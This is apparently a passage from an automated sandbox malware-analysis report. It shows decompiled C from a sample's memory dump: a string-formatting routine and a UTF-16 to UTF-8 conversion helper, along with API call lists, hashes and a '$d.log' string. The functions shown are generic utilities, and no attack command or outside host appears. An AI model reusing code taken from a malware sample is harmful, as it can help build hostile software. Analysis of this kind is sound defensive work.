                                                  												__eax = _v16;
                                                  												if(_v16 >= _v76) {
                                                  													break;
                                                  												}
                                                  												__eax = _v12;
                                                  												 *_v12 = 0x30;
                                                  												_v12 =  &(_v12[0]);
                                                  												_v12 =  &(_v12[0]);
                                                  												_v16 = _v16 + 1;
                                                  												_v16 = _v16 + 1;
                                                  												_a8 = _a8 - 1;
                                                  												_a8 = _a8 - 1;
                                                  											}
                                                  											_v20 = _v20 - _v32;
                                                  											__eax = _v32;
                                                  											__edx = __ebp + _v32 - 0x68;
                                                  											__ecx = _v12;
                                                  											E00403533(_v12, __edx, _v20 - _v32) = _v20;
                                                  											_v20 - _v32 = _v20 - _v32 + _v12;
                                                  											_v12 = _v20 - _v32 + _v12;
                                                  											goto L63;
                                                  										case 7:
                                                  											_v84 = _v84 & 0x00000002;
                                                  											if((_v84 & 0x00000002) != 0 && _a8 > 3) {
                                                  												__eax = _v12;
                                                  												 *_v12 = 0x30;
                                                  												_v12 =  &(_v12[0]);
                                                  												_v12 =  &(_v12[0]);
                                                  												_v84 = _v84 & 0x00000020;
                                                  												if((_v84 & 0x00000020) == 0) {
                                                  													_v5 = 0x78;
                                                  												} else {
                                                  													_v5 = 0x58;
                                                  												}
                                                  												__eax = _v12;
                                                  												 *_v12 = _v5;
                                                  												_v12 =  &(_v12[0]);
                                                  												_v12 =  &(_v12[0]);
                                                  												_a8 = _a8 - 1;
                                                  												__eax = _a8;
                                                  												_a8 = _a8;
                                                  												_v20 = _v20 - 1;
                                                  												__eax = _v20;
                                                  												_v20 = _v20;
                                                  											}
                                                  											goto L55;
                                                  									}
                                                  								}
                                                  								_v16 = _v76;
                                                  								while(_v16 < _v80) {
                                                  									 *_v12 = 0x20;
                                                  									_v12 =  &(_v12[0]);
                                                  									_v16 =  &(_v16[0]);
                                                  									_a8 = _a8 - 1;
                                                  								}
                                                  								goto L35;
                                                  							}
                                                  							if(_v24 == 2) {
                                                  								_a16 = _a16 + 4;
                                                  								_v68 =  *(_a16 - 4);
                                                  								goto L30;
                                                  							}
                                                  							if(_v24 == 3) {
                                                  								_a16 = _a16 + 4;
                                                  								_v68 =  *(_a16 - 4);
                                                  								goto L30;
                                                  							}
                                                  							if(_v24 == 4) {
                                                  								_a16 = _a16 + 4;
                                                  								_v68 =  *(_a16 - 4);
                                                  								goto L30;
                                                  							}
                                                  							if(_v24 <= 4) {
                                                  								L29:
                                                  								_v68 = 0;
                                                  								goto L30;
                                                  							}
                                                  							if(_v24 <= 7) {
                                                  								if((_v84 & 0x00000080) == 0) {
                                                  									if((_v84 & 0x00000100) == 0) {
                                                  										_a16 = _a16 + 4;
                                                  										asm("cdq");
                                                  										_v68 =  *(_a16 - 4);
                                                  										_v64 = _t343;
                                                  									} else {
                                                  										_a16 = _a16 + 8;
                                                  										_t308 = _a16;
                                                  										_v68 =  *(_t308 - 8);
                                                  										_v64 =  *((intOrPtr*)(_t308 - 4));
                                                  									}
                                                  								} else {
                                                  									_a16 = _a16 + 4;
                                                  									asm("cdq");
                                                  									_v68 =  *(_a16 - 4);
                                                  									_v64 = _t343;
                                                  								}
                                                  								goto L30;
                                                  							}
                                                  							goto L29;
                                                  						}
                                                  						 *_v12 =  *_a12;
                                                  						_v12 =  &(_v12[0]);
                                                  						_a12 = _a12 + 1;
                                                  						_a8 = _a8 - 1;
                                                  						continue;
                                                  					} else {
                                                  						 *_v12 =  *_a12;
                                                  						_v12 =  &(_v12[0]);
                                                  						_a12 = _a12 + 1;
                                                  						if(_a4 != 0) {
                                                  							_a8 = _a8 - 1;
                                                  							continue;
                                                  						}
                                                  						break;
                                                  					}
                                                  				}
                                                  				 *_v12 = 0;
                                                  				_t230 = _v6 & 0x000000ff;
                                                  				if(_t230 != 1) {
                                                  					if(_a8 <= 1) {
                                                  						_v44 = _v44 | 0xffffffff;
                                                  					} else {
                                                  						_v44 = _v12 - _a4;
                                                  					}
                                                  					return _v44;
                                                  				}
                                                  				if(_a8 > 1) {
                                                  					E00404E8B(_a4, _v12 - _a4);
                                                  					_t230 = E0040351E(_a4);
                                                  				}
                                                  				return _t230 | 0xffffffff;
                                                  			}

                                                  Instruction addresses (decompiler address column for the statements above, in listing order):
                                                  0x00402bf6, 0x00402bfe, 0x00402c00, 0x00402c0e, 0x00402c0e, 0x00402c14, 0x00000000, 0x00402c17,
                                                  0x00402c38, 0x00402c70, 0x00402c7c, 0x00402ca2, 0x00402cb0, 0x00402cb6, 0x00402cbd, 0x00402d05,
                                                  0x00402d0e, 0x00402da2, 0x00402db3, 0x00402db8, 0x00402dbb, 0x00402dbe, 0x00402dc8, 0x00402df7,
                                                  0x00402dfa, 0x00402e01, 0x00402fb8, 0x00402fbe, 0x00402fed, 0x00402ff3, 0x00000000, 0x00402ff3,
                                                  0x00402fc3, 0x00402fd6, 0x00402fe1, 0x00402fe8, 0x00402fcc, 0x00402fd3, 0x00402fd3, 0x00000000,
                                                  0x00402fd6, 0x00402e0a, 0x00000000, 0x00000000, 0x00000000, 0x00402e4c, 0x00402e52, 0x00402e57,
                                                  0x00402e58, 0x00000000, 0x00000000, 0x00402e2d, 0x00402e38, 0x00402e44, 0x00402e44, 0x00000000,
                                                  0x00000000, 0x00402e63, 0x00402e66, 0x00402e6f, 0x00402e72, 0x00402e75, 0x00000000, 0x00000000,
                                                  0x00402e7d, 0x00402e80, 0x00402e83, 0x00402e91, 0x00402e91, 0x00402e97, 0x00000000, 0x00000000,
                                                  0x00402e9f, 0x00402eb2, 0x00402eb8, 0x00402ebe, 0x00402ec3, 0x00402ec6, 0x00402ec6, 0x00402ecc,
                                                  0x00402ecf, 0x00402ed5, 0x00402ed8, 0x00402ee1, 0x00402ee4, 0x00402ee7, 0x00402e8c, 0x00402e8d,
                                                  0x00402e8e, 0x00402e8e, 0x00000000, 0x00000000, 0x00402f3d, 0x00402f3f, 0x00402f43, 0x00402f4b,
                                                  0x00402f4d, 0x00402f50, 0x00402f56, 0x00402f57, 0x00402f5a, 0x00402f5a, 0x00000000, 0x00000000,
                                                  0x00402f61, 0x00402f61, 0x00402f64, 0x00402f77, 0x00402f77, 0x00402f7d, 0x00000000, 0x00000000,
                                                  0x00402f7f, 0x00402f82, 0x00402f88, 0x00402f89, 0x00402f6c, 0x00402f6d, 0x00402f73, 0x00402f74,
                                                  0x00402f74, 0x00402f91, 0x00402f95, 0x00402f98, 0x00402f9c, 0x00402fa5, 0x00402fab, 0x00402fae,
                                                  0x00000000, 0x00000000, 0x00402ef4, 0x00402ef7, 0x00402eff, 0x00402f02, 0x00402f08, 0x00402f09,
                                                  0x00402f0f, 0x00402f12, 0x00402f1a, 0x00402f14, 0x00402f14, 0x00402f14, 0x00402f1e, 0x00402f24,
                                                  0x00402f29, 0x00402f2a, 0x00402f30, 0x00402f31, 0x00402f32, 0x00402f38, 0x00402f39, 0x00402f3a,
                                                  0x00402f3a, 0x00000000, 0x00000000, 0x00402e0a, 0x00402dcd, 0x00402de0, 0x00402deb, 0x00402df2,
                                                  0x00402dd6, 0x00402ddd, 0x00402ddd, 0x00000000, 0x00402de0, 0x00402cc3, 0x00402cec, 0x00402cf6,
                                                  0x00000000, 0x00402cf6, 0x00402cc9, 0x00402d1c, 0x00402d25, 0x00000000, 0x00402d25, 0x00402ccf,
                                                  0x00402d30, 0x00402d39, 0x00000000, 0x00402d39, 0x00402cd5, 0x00402d9c, 0x00402d9e, 0x00000000,
                                                  0x00402d9e, 0x00402cdf, 0x00402d46, 0x00402d68, 0x00402d8a, 0x00402d93, 0x00402d94, 0x00402d97,
                                                  0x00402d6a, 0x00402d70, 0x00402d73, 0x00402d79, 0x00402d7f, 0x00402d7f, 0x00402d48, 0x00402d4e,
                                                  0x00402d57, 0x00402d58, 0x00402d5b, 0x00402d5b, 0x00000000, 0x00402d9a, 0x00000000, 0x00402ce1,
                                                  0x00402c86, 0x00402c8c, 0x00402c93, 0x00402c9a, 0x00000000, 0x00402c40, 0x00402c48, 0x00402c4e,
                                                  0x00402c55, 0x00402c5c, 0x00402c67, 0x00000000, 0x00402c67, 0x00000000, 0x00402c5e, 0x00402c38,
                                                  0x00402ffe, 0x00403001, 0x00403008, 0x00403031, 0x0040303e, 0x00403033, 0x00403039, 0x00403039,
                                                  0x00000000, 0x00403042, 0x0040300e, 0x00403019, 0x00403021, 0x00403021, 0x00000000

                                                  APIs
                                                    • Part of subcall function 004034F0: EnterCriticalSection.KERNEL32(004084D4,?,?,00403B95,?,0040223F), ref: 004034FA
                                                    • Part of subcall function 004034F0: GetProcessHeap.KERNEL32(00000008,?,?,?,00403B95,?,0040223F), ref: 00403503
                                                    • Part of subcall function 004034F0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00403B95,?,0040223F), ref: 0040350A
                                                    • Part of subcall function 004034F0: LeaveCriticalSection.KERNEL32(004084D4,?,?,?,00403B95,?,0040223F), ref: 00403513
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00402E25
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: CriticalHeapSection$AllocateByteCharEnterLeaveMultiProcessWide
                                                  • String ID: @hqt$x
                                                  • API String ID: 1990697408-949323934
                                                  • Opcode ID: 62f839fcb065556d5f7dcd38b687bddfe24a716fbc26124e9ff0c8591e262c80
                                                  • Instruction ID: de5f171b63c4cf2df39cc20dcf0b4069c023ec7fc3312addd72b1a41fde5bd40
                                                  • Opcode Fuzzy Hash: 62f839fcb065556d5f7dcd38b687bddfe24a716fbc26124e9ff0c8591e262c80
                                                  • Instruction Fuzzy Hash: F1029170904249EFDF41CF98DA89AAEBBF0BF09304F148466E855FB390D378AA41CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			/* Decompiled helper: converts the UTF-16 string in __edx to a newly
                                                  			   allocated UTF-8 buffer. 0xfde9 is CP_UTF8 (65001); a length of
                                                  			   0xffffffff (-1) tells WideCharToMultiByte the input is NUL-terminated.
                                                  			   The byte length (without terminator) is written to *_a4 and the
                                                  			   buffer pointer (or 0 on failure) is returned. */
                                                  			E00403CCC(short* __edx, intOrPtr* _a4) {
                                                  				intOrPtr _t11;
                                                  				short* _t17;
                                                  				char* _t18;
                                                  
                                                  				_t17 = __edx;
                                                  				_t18 = 0;
                                                  				/* First call with a NULL output buffer returns the required size
                                                  				   (including the terminator); only the low 16 bits are kept. */
                                                  				_t11 = (WideCharToMultiByte(0xfde9, 0, __edx, 0xffffffff, 0, 0, 0, 0) & 0x0000ffff) - 1;
                                                  				*_a4 = _t11;
                                                  				if(_t11 != 0) {
                                                  					/* E004034F0 is the sample's heap-allocation wrapper (see the
                                                  					   EnterCriticalSection/GetProcessHeap/RtlAllocateHeap/LeaveCriticalSection
                                                  					   subcalls listed under APIs). */
                                                  					_t18 = E004034F0(_t11 + 2);
                                                  					if(_t18 != 0) {
                                                  						/* Second call performs the actual conversion into the buffer. */
                                                  						WideCharToMultiByte(0xfde9, 0, _t17, 0xffffffff, _t18, *_a4 + 1, 0, 0);
                                                  					}
                                                  				}
                                                  				return _t18;
                                                  			}

                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,$d.log,000000FF,00000000,00000000,00000000,00000000,?,?,?,00403D71,00000000,?,?), ref: 00403CE4
                                                    • Part of subcall function 004034F0: EnterCriticalSection.KERNEL32(004084D4,?,?,00403B95,?,0040223F), ref: 004034FA
                                                    • Part of subcall function 004034F0: GetProcessHeap.KERNEL32(00000008,?,?,?,00403B95,?,0040223F), ref: 00403503
                                                    • Part of subcall function 004034F0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00403B95,?,0040223F), ref: 0040350A
                                                    • Part of subcall function 004034F0: LeaveCriticalSection.KERNEL32(004084D4,?,?,?,00403B95,?,0040223F), ref: 00403513
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,$d.log,000000FF,00000000,?,00000000,00000000,?,00403D71,00000000,?,?), ref: 00403D1A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: ByteCharCriticalHeapMultiSectionWide$AllocateEnterLeaveProcess
                                                  • String ID: $d.log$@hqt
                                                  • API String ID: 635875880-2825629803
                                                  • Opcode ID: 0a1088e63fe4fbfa2349b7c5ac6bd22bcd7c7fd7546fd97f3a37af09754dca1e
                                                  • Instruction ID: f7a405fe1f315cbc39cb45b284df71fb134277089f2554c05c4f1ba3558b2753
                                                  • Opcode Fuzzy Hash: 0a1088e63fe4fbfa2349b7c5ac6bd22bcd7c7fd7546fd97f3a37af09754dca1e
                                                  • Instruction Fuzzy Hash: B2F0BEB1601020BFB3249A6A9C09C377EACDBC1B71304433ABC18EB2D1D930AC0082B0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%